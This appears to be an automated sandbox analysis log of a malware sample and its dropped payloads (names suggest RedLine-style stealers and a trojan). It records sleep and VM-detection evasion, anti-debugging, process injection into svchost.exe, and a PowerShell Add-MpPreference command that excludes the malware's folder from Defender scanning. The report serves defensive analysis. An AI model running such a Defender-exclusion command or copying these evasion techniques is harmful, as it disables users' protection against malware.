Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -198874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99314s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98950s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98817s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98296s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98182s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97809s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97482s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97155s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -96937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -96827s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -96718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -96607s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -96500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -96390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -96281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98432s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98324s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -98099s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97971s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97855s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480 | Thread sleep time: -97598s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe TID: 5408 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 5560 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 5428 | Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 1892 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064 | Thread sleep count: 7370 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064 | Thread sleep count: 1354 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1292 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5808 | Thread sleep time: -429180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5808 | Thread sleep time: -158160000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5740 | Thread sleep count: 41 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 2884 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 7300 | Thread sleep count: 483 > 30
Source: C:\Windows\System32\msdtc.exe TID: 7300 | Thread sleep time: -48300s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7644 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99873
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99762
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99651
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99545
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99314
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99187
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99078
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98950
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98817
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98688
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98406
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98296
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98182
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98066
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97922
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97809
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97703
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97593
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97482
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97375
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97265
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97155
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97046
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96937
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96827
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96718
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96607
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96500
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96390
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 96281
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99890
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99781
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99672
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99547
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99327
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99219
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 99094
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98873
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98766
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98656
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98547
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98432
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98324
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98219
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 98099
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97971
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97855
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97745
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Thread delayed: delay time: 97598
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `}PSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 4NECVMWar VMware SATA CD00
                        Source: SensorDataService.exe, 00000020.00000002.2378524063.0000000000488000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure Driver
                        Source: SensorDataService.exe, 00000020.00000003.2271764851.00000000004E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00
                        Source: alg.exe, 00000005.00000003.2372432615.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2568800965.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2389205186.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2904771126.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2421987511.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device2
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus DeviceNAP
                        Source: AppVClient.exe, 0000000B.00000003.2130504650.0000000000487000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000002.2132174342.000000000049E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000003.2129869821.0000000000480000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                        Source: SensorDataService.exe, 00000020.00000003.2272167666.00000000004E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener
                        Source: alg.exe, 00000005.00000003.2372432615.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2568800965.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2389205186.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2904771126.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2421987511.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW^
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: P|OVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
                        Source: microsofts.exe, 00000003.00000003.2152690816.000000000521F000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2153701229.0000000005238000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
                        Source: SensorDataService.exe, 00000020.00000003.2272167666.00000000004E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                        Source: build.exe, 00000006.00000002.3353405465.0000000001649000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000025.00000002.3331647450.000000000055D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: JVMware Virtual disk SCSI Disk Device
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0045A259 BlockInput, 0_2_0045A259
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0538F520 mov eax, dword ptr fs:[00000030h] 0_2_0538F520
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0538F4C0 mov eax, dword ptr fs:[00000030h] 0_2_0538F4C0
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0538DE80 mov eax, dword ptr fs:[00000030h] 0_2_0538DE80
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_04E13F3D mov eax, dword ptr fs:[00000030h] 2_2_04E13F3D
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_04DD1130 mov eax, dword ptr fs:[00000030h] 2_2_04DD1130
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_00426DA1
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Process token adjusted: Debug
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0042202E SetUnhandledExceptionFilter, 0_2_0042202E
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004230F5
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417D93
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00421FA7
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004015D7 SetUnhandledExceptionFilter, 2_2_004015D7
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004015D7 SetUnhandledExceptionFilter, 2_2_004015D7
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_04E14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_04E14C7B
                        Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_04E11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_04E11361
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C05008
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0043916A LogonUserW, 0_2_0043916A
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe | Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
